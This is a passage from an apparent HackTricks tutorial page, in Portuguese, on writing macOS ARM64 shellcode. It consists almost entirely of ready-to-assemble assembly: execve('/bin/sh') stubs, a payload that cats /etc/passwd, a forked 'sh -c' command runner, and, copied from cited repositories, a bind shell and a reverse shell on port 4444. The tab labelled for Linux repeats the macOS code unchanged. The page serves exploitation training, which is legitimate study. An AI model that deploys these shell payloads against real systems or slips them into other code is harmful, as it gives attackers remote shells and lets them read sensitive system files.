{% tab title="com adr" %}
```armasm
.section __TEXT,__text ; This directive tells the assembler to place the following code in the __text section of the __TEXT segment.
.global _main         ; This makes the _main label globally visible, so that the linker can find it as the entry point of the program.
.align 2              ; This directive tells the assembler to align the start of the _main function to the next 4-byte boundary (2^2 = 4).

_main:
adr  x0, sh_path  ; This is the address of "/bin/sh".
mov  x1, xzr      ; Clear x1, because we need to pass NULL as the second argument to execve.
mov  x2, xzr      ; Clear x2, because we need to pass NULL as the third argument to execve.
mov  x16, #59     ; Move the execve syscall number (59) into x16.
svc  #0x1337      ; Make the syscall. The number 0x1337 doesn't actually matter, because the svc instruction always triggers a supervisor call, and the exact action is determined by the value in x16.

sh_path: .asciz "/bin/sh"

{% endtab %}

{% tab title="com pilha" %}

.section __TEXT,__text ; This directive tells the assembler to place the following code in the __text section of the __TEXT segment.
.global _main         ; This makes the _main label globally visible, so that the linker can find it as the entry point of the program.
.align 2              ; This directive tells the assembler to align the start of the _main function to the next 4-byte boundary (2^2 = 4).

_main:
; We are going to build the string "/bin/sh" and place it on the stack.

mov  x1, #0x622F  ; Move the lower half of "/bi" into x1. 0x62 = 'b', 0x2F = '/'.
movk x1, #0x6E69, lsl #16 ; Move the next half of "/bin" into x1, shifted left by 16. 0x6E = 'n', 0x69 = 'i'.
movk x1, #0x732F, lsl #32 ; Move the first half of "/sh" into x1, shifted left by 32. 0x73 = 's', 0x2F = '/'.
movk x1, #0x68, lsl #48   ; Move the last part of "/sh" into x1, shifted left by 48. 0x68 = 'h'.

str  x1, [sp, #-8] ; Store the value of x1 (the "/bin/sh" string) at the location `sp - 8`.

; Prepare arguments for the execve syscall.

mov  x1, #8       ; Set x1 to 8.
sub  x0, sp, x1   ; Subtract x1 (8) from the stack pointer (sp) and store the result in x0. This is the address of "/bin/sh" string on the stack.
mov  x1, xzr      ; Clear x1, because we need to pass NULL as the second argument to execve.
mov  x2, xzr      ; Clear x2, because we need to pass NULL as the third argument to execve.

; Make the syscall.

mov  x16, #59     ; Move the execve syscall number (59) into x16.
svc  #0x1337      ; Make the syscall. The number 0x1337 doesn't actually matter, because the svc instruction always triggers a supervisor call, and the exact action is determined by the value in x16.

{% endtab %}

{% tab title="com adr para linux" %}

; From https://8ksec.io/arm64-reversing-and-exploitation-part-5-writing-shellcode-8ksec-blogs/
.section __TEXT,__text ; This directive tells the assembler to place the following code in the __text section of the __TEXT segment.
.global _main         ; This makes the _main label globally visible, so that the linker can find it as the entry point of the program.
.align 2              ; This directive tells the assembler to align the start of the _main function to the next 4-byte boundary (2^2 = 4).

_main:
adr  x0, sh_path  ; This is the address of "/bin/sh".
mov  x1, xzr      ; Clear x1, because we need to pass NULL as the second argument to execve.
mov  x2, xzr      ; Clear x2, because we need to pass NULL as the third argument to execve.
mov  x16, #59     ; Move the execve syscall number (59) into x16.
svc  #0x1337      ; Make the syscall. The number 0x1337 doesn't actually matter, because the svc instruction always triggers a supervisor call, and the exact action is determined by the value in x16.

sh_path: .asciz "/bin/sh"

{% endtab %} {% endtabs %}

Ler com cat

O objetivo é executar execve("/bin/cat", ["/bin/cat", "/etc/passwd"], NULL), então o segundo argumento (x1) é um array de parâmetros (que na memória significa uma pilha dos endereços).

.section __TEXT,__text     ; Begin a new section of type __TEXT and name __text
.global _main              ; Declare a global symbol _main
.align 2                   ; Align the beginning of the following code to a 4-byte boundary

_main:
; Prepare the arguments for the execve syscall
sub sp, sp, #48        ; Allocate space on the stack
mov x1, sp             ; x1 will hold the address of the argument array
adr x0, cat_path
str x0, [x1]           ; Store the address of "/bin/cat" as the first argument
adr x0, passwd_path    ; Get the address of "/etc/passwd"
str x0, [x1, #8]       ; Store the address of "/etc/passwd" as the second argument
str xzr, [x1, #16]     ; Store NULL as the third argument (end of arguments)

adr x0, cat_path
mov x2, xzr            ; Clear x2 to hold NULL (no environment variables)
mov x16, #59           ; Load the syscall number for execve (59) into x8
svc 0                  ; Make the syscall


cat_path: .asciz "/bin/cat"
.align 2
passwd_path: .asciz "/etc/passwd"

Invocar comando com sh de um fork para que o processo principal não seja encerrado

.section __TEXT,__text     ; Begin a new section of type __TEXT and name __text
.global _main              ; Declare a global symbol _main
.align 2                   ; Align the beginning of the following code to a 4-byte boundary

_main:
; Prepare the arguments for the fork syscall
mov x16, #2            ; Load the syscall number for fork (2) into x8
svc 0                  ; Make the syscall
cmp x1, #0             ; In macOS, if x1 == 0, it's parent process, https://opensource.apple.com/source/xnu/xnu-7195.81.3/libsyscall/custom/__fork.s.auto.html
beq _loop              ; If not child process, loop

; Prepare the arguments for the execve syscall

sub sp, sp, #64        ; Allocate space on the stack
mov x1, sp             ; x1 will hold the address of the argument array
adr x0, sh_path
str x0, [x1]           ; Store the address of "/bin/sh" as the first argument
adr x0, sh_c_option    ; Get the address of "-c"
str x0, [x1, #8]       ; Store the address of "-c" as the second argument
adr x0, touch_command  ; Get the address of "touch /tmp/lalala"
str x0, [x1, #16]      ; Store the address of "touch /tmp/lalala" as the third argument
str xzr, [x1, #24]     ; Store NULL as the fourth argument (end of arguments)

adr x0, sh_path
mov x2, xzr            ; Clear x2 to hold NULL (no environment variables)
mov x16, #59           ; Load the syscall number for execve (59) into x8
svc 0                  ; Make the syscall


_exit:
mov x16, #1            ; Load the syscall number for exit (1) into x8
mov x0, #0             ; Set exit status code to 0
svc 0                  ; Make the syscall

_loop: b _loop

sh_path: .asciz "/bin/sh"
.align 2
sh_c_option: .asciz "-c"
.align 2
touch_command: .asciz "touch /tmp/lalala"

Bind shell

Bind shell de https://raw.githubusercontent.com/daem0nc0re/macOS_ARM64_Shellcode/master/bindshell.s na porta 4444

.section __TEXT,__text
.global _main
.align 2
_main:
call_socket:
// s = socket(AF_INET = 2, SOCK_STREAM = 1, 0)
mov  x16, #97
lsr  x1, x16, #6
lsl  x0, x1, #1
mov  x2, xzr
svc  #0x1337

// save s
mvn  x3, x0

call_bind:
/*
* bind(s, &sockaddr, 0x10)
*
* struct sockaddr_in {
*     __uint8_t       sin_len;     // sizeof(struct sockaddr_in) = 0x10
*     sa_family_t     sin_family;  // AF_INET = 2
*     in_port_t       sin_port;    // 4444 = 0x115C
*     struct  in_addr sin_addr;    // 0.0.0.0 (4 bytes)
*     char            sin_zero[8]; // Don't care
* };
*/
mov  x1, #0x0210
movk x1, #0x5C11, lsl #16
str  x1, [sp, #-8]
mov  x2, #8
sub  x1, sp, x2
mov  x2, #16
mov  x16, #104
svc  #0x1337

call_listen:
// listen(s, 2)
mvn  x0, x3
lsr  x1, x2, #3
mov  x16, #106
svc  #0x1337

call_accept:
// c = accept(s, 0, 0)
mvn  x0, x3
mov  x1, xzr
mov  x2, xzr
mov  x16, #30
svc  #0x1337

mvn  x3, x0
lsr  x2, x16, #4
lsl  x2, x2, #2

call_dup:
// dup(c, 2) -> dup(c, 1) -> dup(c, 0)
mvn  x0, x3
lsr  x2, x2, #1
mov  x1, x2
mov  x16, #90
svc  #0x1337
mov  x10, xzr
cmp  x10, x2
bne  call_dup

call_execve:
// execve("/bin/sh", 0, 0)
mov  x1, #0x622F
movk x1, #0x6E69, lsl #16
movk x1, #0x732F, lsl #32
movk x1, #0x68, lsl #48
str  x1, [sp, #-8]
mov	 x1, #8
sub  x0, sp, x1
mov  x1, xzr
mov  x2, xzr
mov  x16, #59
svc  #0x1337

Reverse shell

De https://github.com/daem0nc0re/macOS_ARM64_Shellcode/blob/master/reverseshell.s, revshell para 127.0.0.1:4444

.section __TEXT,__text
.global _main
.align 2
_main:
call_socket:
// s = socket(AF_INET = 2, SOCK_STREAM = 1, 0)
mov  x16, #97
lsr  x1, x16, #6
lsl  x0, x1, #1
mov  x2, xzr
svc  #0x1337

// save s
mvn  x3, x0

call_connect:
/*
* connect(s, &sockaddr, 0x10)
*
* struct sockaddr_in {
*     __uint8_t       sin_len;     // sizeof(struct sockaddr_in) = 0x10
*     sa_family_t     sin_family;  // AF_INET = 2
*     in_port_t       sin_port;    // 4444 = 0x115C
*     struct  in_addr sin_addr;    // 127.0.0.1 (4 bytes)
*     char            sin_zero[8]; // Don't care
* };
*/
mov  x1, #0x0210
movk x1, #0x5C11, lsl #16
movk x1, #0x007F, lsl #32
movk x1, #0x0100, lsl #48
str  x1, [sp, #-8]
mov  x2, #8
sub  x1, sp, x2
mov  x2, #16
mov  x16, #98
svc  #0x1337

lsr  x2, x2, #2

call_dup:
// dup(s, 2) -> dup(s, 1) -> dup(s, 0)
mvn  x0, x3
lsr  x2, x2, #1
mov  x1, x2
mov  x16, #90
svc  #0x1337
mov  x10, xzr
cmp  x10, x2
bne  call_dup

call_execve:
// execve("/bin/sh", 0, 0)
mov  x1, #0x622F
movk x1, #0x6E69, lsl #16
movk x1, #0x732F, lsl #32
movk x1, #0x68, lsl #48
str  x1, [sp, #-8]
mov	 x1, #8
sub  x0, sp, x1
mov  x1, xzr
mov  x2, xzr
mov  x16, #59
svc  #0x1337

{% hint style="success" %} Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}